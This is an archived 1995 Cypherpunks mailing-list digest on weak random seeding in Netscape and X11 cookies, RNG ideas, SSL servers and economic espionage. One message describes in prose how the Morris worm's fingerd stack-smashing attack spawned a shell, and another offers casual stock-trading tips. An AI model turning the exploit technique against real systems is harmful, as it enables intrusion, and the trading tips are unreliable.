At 9:47 PM 9/20/95, Ian Goldberg wrote:
....
>   - Ian "I heard that 'x*y=[(x+y)/2]^2 - [(x-y)/2]^2' is a patented way
>		   to multiply numbers of the same parity.  Can anyone verify this
>		   and/or produce a reference?"
....
That trick is probably at least 200 years old. There were once
"quarter square" tables published that started
  i     q(i)
000 000
001 000
002 001
003 002
004 004
005 006
etc.
i [1^2/4]

It works for all parities. ab = q(a+b) - q(a-b)

These tables were published in nautical navigation books.

Mechanical analog computers sometimes used this trick to
multiply shaft positions. There would be a cam that computed
the square of one angle, expressed as another angle.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Thu, 21 Sep 95 17:19:30 PDT
To: iang@cs.berkeley.edu
Subject: Re: XDM has the same problem as netscape ?!
In-Reply-To: <43s1j7$nd3@calum.csclub.uwaterloo.ca>
Message-ID: <UAA01743.199509220019@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <43s1j7$nd3@calum.csclub.uwaterloo.ca>, Ian Goldberg writes:
>In article <9509210631.AA18308@sfi.santafe.edu>,
>Nelson Minar <nelson@santafe.edu> wrote:
>>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had
>>the same problem: the random seed was based on the current time to the
>>microsecond, modulo the granularity of the system clock. I think I
>>figured that on my hardware, if I could figure out which minute the X
>>server started (easy with finger), I'd only have to try a few
>>thousand keys or so. Caveat: I never actually proved the idea.
>
>Wow.  I just checked, and Nelson's right.
[...]

Of corse you can do what I have been doing for years:

$cookie=`good-source-or-random-hex-strings`
xauth add $DISPLAY MIT-MAGIC-COOKIE-1 $cookie
xinit ~/.xinitrc $DISPLAY -- $server :$port -auth $XAUTHORITY

(assuming you set the various variables correctly)

This will allow you to gennerate your own cookies rather then
relying on MIT.  (I actually have C code to set the cookie dirrectly,
since I don't really care to have it visable to ps, even breifly).

Unfortunitly X will blat the "secret" out in the clear every time you
make an X connection, so it still isn't very good.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Thu, 21 Sep 95 19:06:20 PDT
To: cypherpunks@toad.com
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To: <ac87162a440210044474@[205.199.118.202]>
Message-ID: <m0svxOg-000772C@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In servalan.mailinglist.cypherpunks Tim May writes:
>Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
>used and added to, but I can imagine something like this could be done.

Um, if you mean "freely distributable, in source form" by "Gnu-style",
I don't think there's much of a shortage of Gnu-style WWW browsers and servers. 
Lynx and Chimera are my two favorite WWW browsers, and both come in source form.
Then there's w3.el, the WWW browser for Emacs.   As for Web servers, you can
get the source code for Plexus or CERN httpd off the net.  Plus, doesn't
Eric Young have someone's httpd already hacked to include SSL-compliant
encryption?

The question becomes why don't the free WWW software people out there now
support crypto?  Maybe they're simply not expert in or interested in crypto,
or maybe they don't want to mess with the ITAR hassles. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 21:13:39 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: Netscape closes up 1 3/8 today!
In-Reply-To: <v01530503ac87c0c951e6@[166.84.250.21]>
Message-ID: <199509220408.VAA10258@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> At 1:30 PM 9/21/95, sameer wrote:
> >        The only bad publicity is no publicity.
> 
> This assumes that you're trying to sell something.  Some people actually
> have no use or desire for publicity.  Publicity has caused a quick and
> painful death to many scenes, movements, cabals, and "temporary autonomous
> zones."

	Yes, this is a good point. If you are trying to sell
something, then, the only bad publicity is no publicity. But you are
describing cases where -any- publicity is detrimental to the "thing",
in which case the publicity, "bad" or "good", is "bad".

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 18:28:55 PDT
To: MIGUELDIAZ@megaweb.com (Miguel Diaz)
Subject: Re: Seeds which depend on machine states
In-Reply-To: <199509211044.GAA25896@mail-e1a.megaweb.com>
Message-ID: <199509220128.VAA01900@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Miguel Diaz writes:
> It is my suspicion that seeds which depend on machine 
> states(ie state of your computer at a specific instance of 
> time) would always be subject to scrutiny and de-cryption.
> As long as the software used to encrypt is not self-modifying, 
> the machine state can (through careful manipulation involving 
> temperature, clocks, processes etc)always be replicated and 
> fixed to an acceptable degree.

Try getting a human to type with the same timing, to microsecond
precision, the same way twice.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Thu, 21 Sep 95 18:31:04 PDT
To: sameer <sameer@c2.org>
Subject: Re: Netscape closes up 1 3/8 today!
Message-ID: <v01530503ac87c0c951e6@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:30 PM 9/21/95, sameer wrote:
>        The only bad publicity is no publicity.

This assumes that you're trying to sell something.  Some people actually
have no use or desire for publicity.  Publicity has caused a quick and
painful death to many scenes, movements, cabals, and "temporary autonomous
zones."

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Thu, 21 Sep 95 21:38:47 PDT
To: Joe Block <jpb@miamisci.org>
Subject: /dev/audio RNG
In-Reply-To: <v01520c05ac87bbe891da@[199.227.2.142]>
Message-ID: <Pine.OSF.3.91j.950921212806.29336B-100000@saul1.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've been working on a Linux RNG. I'm sure you could port this, but it 
might take some work for Microsoft based programs...

--- CLIP HERE ---
#!/usr/bin/perl   
($b,$s)=@ARGV;$b/=16;open(A,"/dev/audio");while($b--){$t=time;$t+=
$s||die"Syntax: $0 bytes security\n";open(O,"|./md5");while(time<$t){
read(A,$x,500);print O $x;}close O;}close A;print"\n";

# USAGE: rng <bytes> <security level>. One external command is used:
# ./md5 which I created using 
#   gcc -O3 -mpentium -o md5 md5.c md5drivr.c 
# where md5drivr.c is modified so that MDFilter()'s line printf("\n")
# is commented out.
--- CLIP HERE ---

Runtime = security * (bytes/16) assuming your machine is fast enough.
Each set of 16 bytes uses $s seconds of /dev/audio input to create.
I guess you could replace /dev/audio with /dev/mouse. Of course, if you
get nothing but d41d8cd98f00b204e9800998ecf8427e you may want to use
some other source. :)

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 21 Sep 95 22:33:41 PDT
To: perry@piermont.com
Subject: Re: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220503.WAA05140@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509220443.AAA02254@frankenstein.piermont.com>, "Perry E. Metzger" <perry@piermont.com> writes:

> Tom Weinstein writes:
>> While it is certainly true that you can stomp on memory in static
>> buffers, it's not clear that you can execute whatever code you insert
>> there.  If the buffer happens to be allocated off the stack (and the
>> stack grows down) then you can modify the return address.  Of course,
>> you have to know the address of whatever code you want to execute.

> Lets say, Mr. Weinstein, that you shove some code onto the stack along
> with the return address, and the address happens to be the code.

I never disputed that it could be done, I was just uncertain as to how
easy it would be.  As has been pointed out, it's not nearly as hard as I
thought, assuming you can execute in the stack.

> If you don't believe it can be done, its easy enough to demonstrate it
> on your machines, which I believe suffer from the syslog(3) bug, which
> your company hasn't patched so far as I know, and which afflicts the
> Sendmail daemons you ship with your machines. See the recent 8lgm bug
> report if you want details.

Hmm, could you explain how to exercise this bug?  Perhaps a sample
program?

>> Of course, that also assumes that you can execute from the data area
>> which is not always true.

> Its usually true on modern machines -- its very difficult to rig
> things otherwise given the way that lots of the dynamic loading works
> these days.

True.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Thu, 21 Sep 95 19:19:20 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220208.CAA00564@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


> I question the accuracy of this.  The fingerd bug was that a string in
> the static data area was read in with gets which could be overflowed.
> At some point in memory after this input buffer was the string constant
> that stored the name of the finger command.  What the Morris work did
> was to overflow the input buffer and replace the string constant
> "finger" with "csh".  When fingerd then exec'ed the command, that gave
> you a shell running on the machine.

Nope, that wasn't it, either.

See the Eichin/Rochlis "tour of the worm" paper.  

I was visiting friends at MIT the night the worm hit.  After receiving
some confused and unspecific reports that the worm was getting in
through fingerd, I had a flash of insight as to how that might happen;
as it turned out, this insight was correct, and shortly thereafter, I
had reproduced a benign form of the fingerd attack.  As implemented by
the worm, it only worked on vaxes, but it could have worked on other
systems.

The buffer in question was on the stack, not in static storage.

The attacker wrote a long sequence of NOP's, followed by machine
instructions which implemented the equivalent of exec("/bin/sh"),
followed by the approximate stack address of the stack buffer; the
last address was at the right place to overwrite the saved PC field in
the stack frame.  When the routine "returned", it actually branched
into the runway of NOP's, and then exec'ed "/bin/sh".

Note that the actual stack address varied, as environment variables
(which tend to vary from installation to installation) are located at
the top of the stack.

As it turned out, the attack did not work on most Athena systems,
because the athena /etc/rc complex wound up using a large number of
environment variables which pushed the location of the stack frame in
question out of the range where the attack would have worked.

					- Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Thu, 21 Sep 95 19:15:29 PDT
To: vince@offshore.com.ai (Vincent Cate)
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <Pine.3.89.9509211743.A459-0100000@offshore.com.ai>
Message-ID: <199509220214.WAA16926@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Why not just do something similar to what PGP does?  

Yes, why not... (it's been suggested before)

> For netscape you could have a user make circling motions with the mouse
> and clicking at random times.  For each click of the mouse you could get a
> few bits of randomness from the time, the X position, and the Y position. 
> You could get random bits really fast this way. 

Careful... the buttons one tends to click on are in the same regions,
and the entropy would not be as great as say, with keyboard timings.
I think fast timings between clicks (maybe added or xor'd with low bits
from mouse positions?) is a better solution.

Though the best way is to experiment... I wrote a DOS ISR to capture
timings between clicks ('keyrand?.zip' on some ftp-sites) and experimented
with speeding up the system clock (which is normally 18.2 times/sec), but
the entropy appeared lower (superficially less random).

-Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 19:32:08 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <9509211553.AA17620@cantina.verity.com>
Message-ID: <199509220231.WAA02083@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Patrick Horgan writes:
> Perry said:
> > 
> > Also be especially careful about how you run the thing! Don't use
> > popen or anything like it!
> 
> There's nothing inherently wrong with using popen or system.

Nor is there anything inherently wrong with having sex without the use
of a condom.

However, it is very difficult -- VERY DIFFICULT -- to prove to
yourself that there is never an instance in which your system() or
popen() can be abused. In any case, I find its often more prudent just
to strip all these things out of my code. If you don't use them, you
don't have to prove they are done properly. Paranoia is your
friend. No one can ever break you for doing something you don't do.

> The problem arises when you use information given to you from
> outside as the argument to popen or system without checking it.

Yup, but often, you'd be suprised what turns out to be outside data.

In any case, you obviously also understand why this is bad, but I hope
that people out there understan -- always make sure that you are
double extra careful about the use of such calls.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 21 Sep 95 20:22:59 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*) (fwd)
Message-ID: <199509220334.WAA02419@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 21 Sep 1995 22:46:09 -0400 (EDT)
> From: Black Unicorn <unicorn@polaris.mindport.net>
> Subject: Re: economic espionage (@#$%^&*)
> > 
> > ah yes, just like the way Clinton alone came up with the whole
> > Clipper idea as a way to balance the legitimate goals
> > of law enforcement with the right to privacy in society.
> 
> Uh, how do you see balancing in the economic intelligence issue?
> Do you believe espionage is never justified?
> "Gentlemen don't read each other's mail" almost lost a war.
> 

All out espionage should, idealy at least, only take place if there is
evidence that a nations indipendance is directly involved. By this I mean
active methods versus passive eavesdropping. It is one thing to send aloft
satellites to record cellular traffic between cars and quite another to
actively insert agents provocateur.

> 'Intelligence officials in the United States estimate that at least twenty 
> foreign nations are currently engaged in intelligence activities 
> "detrimental to our economic interests...."'
> 

I had hoped they were better investigators than this, only 20? Or perhaps
this is a truer indication of our national paranoia.

> 
> 'The White House Office on Science and Technology estimates losses to U.S. 
> businesses from foreign economic espionage at nearly one hundred billion 
> dollars per year.'
> 

What are its estimates on what US business gains with its present industrial
espionage infrastructure? Without these numbers the quoted above are
useless.

                                               Jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 21 Sep 95 19:45:37 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: economic espionage (@#$%^&*)
In-Reply-To: <199509211936.MAA23834@netcom13.netcom.com>
Message-ID: <Pine.SUN.3.91.950921221122.14509A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Sep 1995, Vladimir Z. Nuri wrote:

> 
> >> >It was said that Pres. Clinton had given a speech while 
> >> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
> >> >said in this speech that obtaining  industrial 
> >> >informations has the highest priority and this were the 
> >> >new  task for the spies.
> 
> ah yes, just like the way Clinton alone came up with the whole
> Clipper idea as a way to balance the legitimate goals
> of law enforcement with the right to privacy in society.

Uh, how do you see balancing in the economic intelligence issue?
Do you believe espionage is never justified?
"Gentlemen don't read each other's mail" almost lost a war.

> 
> careful Bill, your strings are showing. and I won't say 
> who is the puppeteer, but he has the initials N.S.A.
>

You need to write a conspiracy book.

> pardon me, but this new "economic espionage" sleazoid-intelligence-
> agency-justifying bugaboo really annoys me.

You prefered it when they were funding gunrunning and hostage negotiation 
with drug profits and abbetting smuggling?

> I would *die* to see an op-ed in the NYT with the subject:
> "economic espionage: the new bogeyman decoy after the cold war"

Uh, you've not been looking.  Many have criticised the new emphasis as 
justification in a threatless environment.

***

A very interesting note has been published on the subject just recently.
Interested parties might want to check out:

Augustini, Jeff, "From Goldfinger to Butterfinger: The Legal and Policy 
Issues Surrounding Proposals to Use the CIA for Economic Espionage,"
26 Law & Pol'y Int'l Bus. 2 (Law and Policy in International Business, The
International Law Journal of Georgetown University Law Center).


While the author misses some key points, goes off on a silly 
anti-trust tangent which totally misreads the current state of antitrust 
law, and makes some outright misses on the legal logistics of passing 
the information through government channels, the work also holds some 
interesting research about the programs of Japan, France, Germany and Isreal.

Some Choice Parts:

'Intelligence officials in the United States estimate that at least twenty 
foreign nations are currently engaged in intelligence activities 
"detrimental to our economic interests...."'


'The White House Office on Science and Technology estimates losses to U.S. 
businesses from foreign economic espionage at nearly one hundred billion 
dollars per year.'


'Allegations within the French Government accuse U.S. personal, including 
four diplomats, attempted to steal secret government documents relating 
to Franco-American trade disputes.'


'A classified CIA report lists two top Japanese intelligence priorities as 
(1); intelligence regarding access to foreign sources of raw material and 
(2) "detailed intelligence on technological and scientific developments 
in the United States and Western Europe."'


'In addition to intelligence operations abroad, the French are notorious 
for routinely eavesdropping on, and conducting "bag jobs" against, U.S. 
businessmen visiting France.  To conduct these "bag job" operations,
the French allegedly maintain an extensive network of part-time or 
volunteer informants known as "honorary correspondents," whose main tasks 
are to help the DGSE (French Intelligence) gain entry into hotel rooms, 
delay or distract targets, and provide an early warning system in cases 
where targets return early... placing electronic eavesdropping equipment 
on Air France flights between Paris and New York to listen in on 
traveling U.S. businessmen, attempting to plant moles in European 
branches of U.S. corporations, and wiretapping state-owned communications 
lines used by U.S. companies located in France.'


Most interesting for cypherpunks:

An ominous footnote #111 indicates that:  'While many American companies 
employ encryption equipment, under French law they must give the "keys" 
to the French government.  This allows the French Intelligence services to 
listen to encoded transmissions.'


If anyone wants a fuller summary, I'll post it to the list with enough 
interest.


Moral:  Even a clueless Law Student comments on intelligence better than 
"Vlad."

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Thu, 21 Sep 95 20:23:17 PDT
To: rmtodd@servalan.servalan.com (Richard Todd)
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To: <m0svxOg-000772C@servalan.servalan.com>
Message-ID: <199509220323.XAA09674@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu Sep 21 21:59:00 1995: you scribbled...
> 
> In servalan.mailinglist.cypherpunks Tim May writes:
> >Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
> >used and added to, but I can imagine something like this could be done.
> 
> As for Web servers, you can
> get the source code for Plexus or CERN httpd off the net.  Plus, doesn't
> Eric Young have someone's httpd already hacked to include SSL-compliant
> encryption?

Yes.  This has been done.  A set of patches for NCSA's HTTPd (for US 
folks only) can be found at

	http://petrified.cic.net/~altitude/ssl/howto.html

I got the patches from the ssleay gang in AU, but i haven't seen them on
their ftp site yet, so if you're outside the states, it'll be available
rsn (i think...)

> The question becomes why don't the free WWW software people out there now
> support crypto?  Maybe they're simply not expert in or interested in crypto,
> or maybe they don't want to mess with the ITAR hassles. 

Well, I have been trying for the last 3 months to put together a "free"
WWW server to both commercial and non-commercial institutions in the
states (I'm only concerned about people in the states for now because most
of the important issues are moot if you're outside of the states).

The main problems that I've run into are:

   * Crypto is a difficult topic to understand:
       I didn't know anything about crypto when i started.  It's taken me
       this long to start understanding the fundamental concepts and such.
       And i'm still really in the dark about a lot of it.

   * Specific information about crypto, (especially licensing and other
     legal stuff) is difficult to find.
       Since there are so many patents/trade secrets regarding crypto
       libraries/algorithms/protocols, any developer MUST deal with the
       corresponding companies.  That process is long and painful.

   * Money
       There are bound to be legal problems, for example, the RC4
       situation.  According to everything I've heard, it is legal to use
       RC4 because it doesn't have trade secret status anymore.
       Unfortunately, RSA will most likely bring suit to anyone who tries.  

   * ITAR
       'Nuff said.

As for my plan to "provide" a ssl'ized web server, my plan is to put
together a "package" which contains NCSA's HTTPd, SSLeay, and a version of
RSARef.   I would only charge whatever the licensing costs were to me
(There's a minimum $20 cost for the commercial RSARef from Consensus, and
I'm still working on the RC4 licensing).

Oh yeah, one other problem is that companies like RSA are completely
unaccustomed to dealing with people providing "free" products.  For
example, At first, RSA kept asking me for a "Business Plan" so that we
could work out a percentage royalty that I would pay them for RC4
licensing.  They were completely aghast when i said that I wanted to
provide it for free.  The pointed me to RSARef, but i told them that i
wanted to provide it for commercial institutions too, so they asked for
business plan, and the cycle continued....  (I've started working with
them again, so things are progressing for now...).  I know that I don't
really have to go through the RC4 licensing with RSA, but i don't have the
money to buy dinner, let alone go head to head with RSA in court.

anyway, if y'all are interested, more info can be found at
http://petrified.cic.net/~altitude/ssl/ssl.saga.html.  I'd be happy to
answer questions, but seeing the knowledge level on the cp list, i feel
sort of inferior.

Thanx.

...alex...

     Alex Tang  altitude@cic.net   http://petrified.cic.net/~altitude
   CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer
       Viz-It!: Software Developer (Check out http://vizit.cic.net)
  UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Thu, 21 Sep 95 20:53:28 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Cypherpunks, Sun and JAVA
Message-ID: <199509220353.XAA02204@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Today at the Sun JAVA presenation in NYC.. Sun staff member
Hal Stern who was talking about security mentioned Cypherpunks..
when talking about Thomas Jefferson saying roughly that Jefferson
would be one if he was a live.

He might read this list (Hi Hal!).

Anyway he gave a good talk on securty and actually seemed to
be aware of many of the issues.

/hawk
-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 21 Sep 95 21:57:18 PDT
To: cypherpunks@toad.com
Subject: NSCP: Unch..vol rises...morn selling
Message-ID: <199509220457.VAA09524@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Volume Rose.
Morning selling.
Afternoon buying.

It's now a good bull, bear tussle.
I'd sure speculate on the "patch" 
until tomorrow afternoon. If not 
there, by 2:00 unload any position.

This is a good day trading stock for now.
Lots & lots of movement.


Symbol        : NSCP        Exchange    : NASDAQ

Description   : NETSCAPE COMMUNICATIONS CORP COM             

Last Traded at: 58 3/4      Date/Time   : Sep 21  4:00   
$ Change      : 0           % Change    : 0.000000    

Bid           : 58 3/4      Ask         : 59          
Volume        : 436900      # of Trades : 550         
Opening Price : 55          Last Shares : 5           
Day Low       : 54 1/4      Day High    : 59 1/8      
52 Week Low   : 45 3/4      52 Week High: 74 3/4 
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 21 Sep 95 21:04:51 PDT
To: cypherpunks@toad.com
Subject: Netscape RNG
Message-ID: <v01520c05ac87bbe891da@[199.227.2.142]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'd like to see the Netscape RNG implemented as a plug-in, preferably
with sample source included to make it easier for other people to create
compatible plugins.

Once there was a published API for the RNG, other apps could use it as well.

I like the option of using a cypherpunks approved RNG.  No offense to
Netscape, but I'd feel a lot more comfortable using a RNG with say
Perry's signature or Matt Blaze's.

jpb
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMGINp2GnwFiC3O2NAQGUYwf/e7D+Eg3FmPuovUOWEYFmh5T5PZlPD0BJ
Ricg4f0UDA34IVrCCKoM1cDvRye8hUerVSjLJDcm/baghrHhoEZCevLsiq4SefbT
XuDIjpE+6wM0I5Yz/bU4HK5O2PsvFXRbvgQog0evGKIT2CJPPY/XEBUyPJFTQRcZ
1zr8hbVD74Xj4Xs2q3FEpI7xT4brVFhOluF4j4/jDIbkR3cIbDB0SJgH838rrcjz
kp6t+aRqYHJuBwIpVpA522yrhi07opXidTD6LjsZupkSkf3F7twDZwHwM5wv15YL
kxhEMv7kREcNNcb1k1bC0luP5KrzDHtFG+wBKraTiSTJIqTGyXw5Ug==
=4wHh
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 21 Sep 95 21:05:16 PDT
To: cypherpunks@toad.com
Subject: Miami FL key signing
Message-ID: <v01520c06ac87be682849@[199.227.2.142]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm interested in setting up a key-signing in the Miami-Ft. Lauderdale
area on 28 or 29 October.

Location is flexible, but the date isn't very - a friend of mine is going
to be in town from Down Under from some time on the 27th to the morning
of the 31st and he'd like to snag as many signatures on his key as possible.

Joseph Block <jpb@miamisci.org>

"The subjection to which the American citizen is now exposed every day
of his life is so great that the whole idea of liberty ("That which
does not injure one's neighbor") is almost totally lost. The greatest
of despots, Louis XIV, never told his subjects what they could or
could not eat and drink, and he never told them how to conduct their
private lives."
- -- Jeff Cooper
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMGIQGmGnwFiC3O2NAQEIpQgAwSto9BFdkm1qmtDnDsjAe5JDzP/GrKIm
3yvAA0Uzzl5kg2PVqRWqj4uM0O9ExBO9AN/7iFDinAaEAJTAmfzWQF8ZHNo/EmrM
lH3Ec84asrbBBy0pYbQuT3Sj2CDGWk6HtlBOIyn/PKljIW0tz6AeCN0i9T7kNLhO
zX6N+4Oq+w2HX9p+OFAbeSE8zlUEh4KNM2bn16GOW+DpxGfGln2Zir3zli4LCZUi
UYlVyGWgxiVWzc1a83dar3WByyxcQaGDBL+wtm5bUJGTBywI/8KI8loCYY/6nIvn
w1pqqvTsEKfez+Q3ej7L6nl8XOK4tO9E+hUNF7p9fdXnqCz20j/uyQ==
=8pcs
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 22 Sep 95 00:11:25 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*)
Message-ID: <199509220711.AAA02426@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>> >It was said that Pres. Clinton had given a speech while 
>>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
>>> >said in this speech that obtaining  industrial 
>>> >informations has the highest priority and this were the 
>>> >new  task for the spies.

Dr. John Deutsch, speaking to the National Press Club, also mentioned
economic espionage, with the State Department as a primary
customer, but was concerned about definitions of goals, etc.
He did reassure the NPC that the CIA would continue to work with
drug dealers and corrupt South American military and other scum
who have information to sell, as well as cooperating more closely 
with the FBI and DEA, but on the other hand he does apparently
view domestic operations as clearly outside the CIA's job.
One set of content in his speech was the planned combination of
the various satellite data interpretation organizations
into one group of CIA/Pentagon/NRO/NSA/etc.

ObCrypto: One questioner asked him about the growing use
of encoding and would the CIA be able to keep up eavesdropping on
people.  "We're very good at eavesdropping" was his main reply;
he did acknowledge that there was an issue but didn't go into 
the party line about needing to have escrow to get GAK.

Clinton, meanwhile, reassured guests at a $1000/plate fundraising 
lunch that the Republicans' economic plans would mainly affect
the poor and wouldn't trouble the rich too much...   :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 21 Sep 95 21:18:18 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape RNG
Message-ID: <v02120d05ac87e8be0390@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:04 AM 9/22/95, Joe Block wrote:

>I'd like to see the Netscape RNG implemented as a plug-in, preferably
>with sample source included to make it easier for other people to create
>compatible plugins.

This sounds like a job for.... CyberDog!!!

Well, OpenDoc, anyway. How 'bout Mozilloids? Any plans for OpenDoc parts in
the works? There's talk on micp about making PGP parts...

Cheers,
Bob Hettinga

I know, I know, If you told me, you'ld have to kill me...



-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 21:43:51 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: netscape bug
In-Reply-To: <199509212242.PAA04533@orac.engr.sgi.com>
Message-ID: <199509220443.AAA02254@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> While it is certainly true that you can stomp on memory in static
> buffers, it's not clear that you can execute whatever code you insert
> there.  If the buffer happens to be allocated off the stack (and the
> stack grows down) then you can modify the return address.  Of course,
> you have to know the address of whatever code you want to execute.

Lets say, Mr. Weinstein, that you shove some code onto the stack along
